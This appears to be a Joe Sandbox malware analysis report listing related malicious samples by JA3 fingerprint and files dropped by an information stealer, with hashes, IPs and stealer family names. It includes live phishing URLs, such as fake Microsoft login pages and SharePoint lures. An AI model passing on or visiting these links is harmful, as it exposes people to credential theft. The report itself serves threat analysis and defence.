	https://t.apemail.net/c/nqkqiuydkvjvgaqbdiaqcvagdibq6dyhdihaaaihdjlfiayfa5laivksb5kaifi3audqmdycaibrwaabaadqmbagaynq4byoaedqeaipamnqogyvpf3bkgyvafkambqpkikwu-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmcqabqaaicqagygaeaqobyoaunqkbygb4baeay3aubq6dyaaacqmgyvarjqgvktkmbacgqbafkamgqdb4hqogqoaaaqogswkqbqkb2warkved2uaqkrwdqhbyaqoaqbb4brwflqivle4rcdlbmvef3yi5jfsf37lbbeiuqxpzmucxsdkzbv4wczc4nbo7kclelqmdyxcelv2qszaubboh3gijpfixaxmrjfsuy6cunrkyk6kjaboz2flbdverkdjykrwaabaadqmbagaynrkx2dinduidiydbcveqksi5pe6gkulbnbqvsakjcvqascdbcqgbcgaiauggk7innfwfi3incueuq3aabaegyvpf3bkg2zijnvwg2zijnvwg2zijnvwg2zijnvwgyvafkambqpkikwu	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://forms.gle/KqV1AqKqvhP9vt539	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08	Get hash	malicious	HTMLPhisher	Browse	172.67.182.147
	ATT3580985_Scarboroughmaine.html	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDcEIKxjNFA-2BOW13itfj7a9IAzLwYt2QBGTig873yAaWkSzjh6k2lp7PGB45u-2B0rwxkiVm0ngeN9d9zp58ORY4qn2tSSGabCeN4rHRoJ0HL6Uy1uvcYQUMnyltAVQ4rdLTiE5btFdx9yQI2-2Bi2WQp4ms-3D0zLO_ETCJ0r0Oh88FRuxFQzOawcXtZOWvJo7Ia7Oiom44JEoHmOcNKRDD0Zo7gwsxBLmkEeNmflUt5nA8n-2BuxtDyAaxBr28alK692RqBKqXlRRBXNtLjZMBLWb4Ovd7Fwl5Ap0Q1auHmx969SszcNpGv6kNqNnQ-2FYwt6p5kGKuh1FO9ZwvdbFNJYvtdr4C-2BJjyG-2BKPyRzefO7iJKQTaVVEO-2BqKA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://sites.google.com/l0gin-microsoftwebonlne.app/867487/	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://sites.google.com/l0gin-microsoftwebonlne.app/867487/	Get hash	malicious	Unknown	Browse	173.222.162.64
	https://u23920825.ct.sendgrid.net/ls/click?upn=u001.uHc2Hvk2zEz7Em0XAnh4-2BYL9qVTLhdQvozIk8ObL-2FM-2BHl5pMQT-2FUp8EFv3L01ejhvQOz6gpUeNbJ-2FpjdVgcq199venLVkPSJZOmQA8Gp-2FAYnh4QMsVdqZir-2BsjjKJZF6oycO_3qmYhu9eGb8PmC9DYiles2d3LUitgGXA8-2B6itiWa8URzbR0lwkoj39GbNx6ZU4HBGdKq-2FSnrP-2FGKG57n2WWTRsTfK-2F1qp9GXNxMKiGc0vrVCFGOp0S4tmGxx6RAVMMa-2FjAFmG6QeWnL8-2BDqzlNJFOq15YimRp8DtIUQD7vQqdHAG4l10a2ECVnGb6-2F8b7ujCwfMLg1s0VgNaD3sN5XRq5MQ1ol4rmwfiuu8mB3nfUxc-3D	Get hash	malicious	Unknown	Browse	173.222.162.64
	https://renesolapower-my.sharepoint.com/:f:/g/personal/jake_snow_emeren_com/EulAj07H75ZBrOaSqkq0rR8B6BicsAGsyDN8UAJBmcaOlg?e=5%3auGpGuJ&at=9	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	https://cityofcumming-my.sharepoint.com/:o:/g/personal/jon_heard_cityofcumming_net/EiM-FI2EFEhEss7CVdkNqlkB3mo1kb_GWuQRMyeuYywohw?e=5%3aVt8uKH&at=9	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	Attachment_8378637861.170631.HTM	Get hash	malicious	Unknown	Browse	173.222.162.64
	EFT 06282024, 013441 PM.html	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://jeezipax.co.in	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	https://singlecity.it/test/E/1.htm	Get hash	malicious	Unknown	Browse	173.222.162.64
	Marches-gestion_faxcopy60985sti.htm	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
a0e9f5d64349fb13191bc781f81f42e1	MOD_200.pdf.lnk	Get hash	malicious	Arc Stealer	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	capisp.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	20240506_120821.xls	Get hash	malicious	Unknown	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	Renameme@1.xls	Get hash	malicious	Unknown	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	mkFOY01Gl5.exe	Get hash	malicious	LummaC	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	zyJWi2vy29.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	92s4OjHVFf.exe	Get hash	malicious	LummaC	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse	172.67.132.113 34.117.186.192 104.26.9.59 188.114.97.3
37f463bf4616ecd445d4a1937da06e19	68#U2466.hta	Get hash	malicious	Unknown	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	MOD_200.pdf.lnk	Get hash	malicious	Arc Stealer	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	SecuriteInfo.com.Win32.BootkitX-gen.7605.8583.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	capisp.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs	Get hash	malicious	GuLoader, Remcos	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	doc20240625-00073.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	SeAH RFP_24-0676#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	20240506_120821.xls	Get hash	malicious	Unknown	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108
	New Order CHAL-0435.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	79.174.95.43 3.5.20.219 54.210.117.250 87.240.132.78 162.159.133.233 149.154.167.99 95.142.206.3 104.192.141.1 142.250.181.225 95.142.206.2 188.114.96.3 95.142.206.1 45.130.41.108

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	jlO7971vUz.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	Rnteb46TuM.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	1jPL5zru3u.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	Zachv5lCuu.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse
	j7iUba2bki.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse
	ukuWaeRgPR.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	8Scta2jVt5.exe	Get hash	malicious	CryptOne, Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\FCBFBGDBKJ.exe	zyJWi2vy29.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse
C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEBAFBGIDHCBFHIECFCB

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe

Download File

Process:	C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3942200
Entropy (8bit):	6.454608555117161
Encrypted:	false
SSDEEP:	49152:iX1kN5mAv+7kHU4A7g9nsHccuooirQCdt35BpZEac2HqGM:TNY2+7OU4i4sHzuooaQCdb/c2HqGM
MD5:	0918C3DC6A1E6CCE306FA4FF996E66BB
SHA1:	ABB776446C0697A8AE8C790A0C838EA5D1FBF406
SHA-256:	6ED20F480C9170A3E77E0C8E1AC4A0EEA697BE7E9D9199C19DBDE47CCADA3ED3
SHA-512:	E9F8E550E91E4B4D09CB63C0C6BD263D89C461687A32E6D68642441818C65F216CD79FC117CB6E92252567FB0A4C09142AC95F828DA1BFC860DD65DE02B7017D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........'..........0....................@..........................`<......................................................................................................................................................................text............................... ..`.hhead9.F$.......0..................@..@.data....S... ...0... ..............@....rsrc................P..............@..@.ihead9..@... ..87..................a.\|.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAEHIEBGHDAFIEBGIEHJECGCGC

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAEBFHJKJEBFCBFHDAEGHCBFBG

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJKEHCAKFCAKFHDAAAAECFCG

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCBFBGDBKJ.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	7.661614937929796
Encrypted:	false
SSDEEP:	12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
MD5:	0309DD0131150796EA99B30A62194FAE
SHA1:	2DF6E334708EAE810A74B844FD57E18E9FDC34CD
SHA-256:	07C09BA5A84F619E5B83A54298FFC58D20B00F14399C7A94B7F02B70EFC60F35
SHA-512:	3D4E5A0718D04FEE92D8040880B631107D1E23A6B3BCE430D58769179AF999C28B99E50C5CD45F283339F7BBB24FFACBF601A5447EDB12E28DA4517FBFA282E8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Joe Sandbox View:	Filename: zyJWi2vy29.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L......f...............'.@..........Rt.......P....@..........................0............@.............................P.......<...................................h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\AFHDAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\AKKECA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\CFHIIJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\CFHIIJ-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\DBFHDB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\FIJECAEHJJJK\DBGHDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\ECBGIE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\HDGIEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\HJEBGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
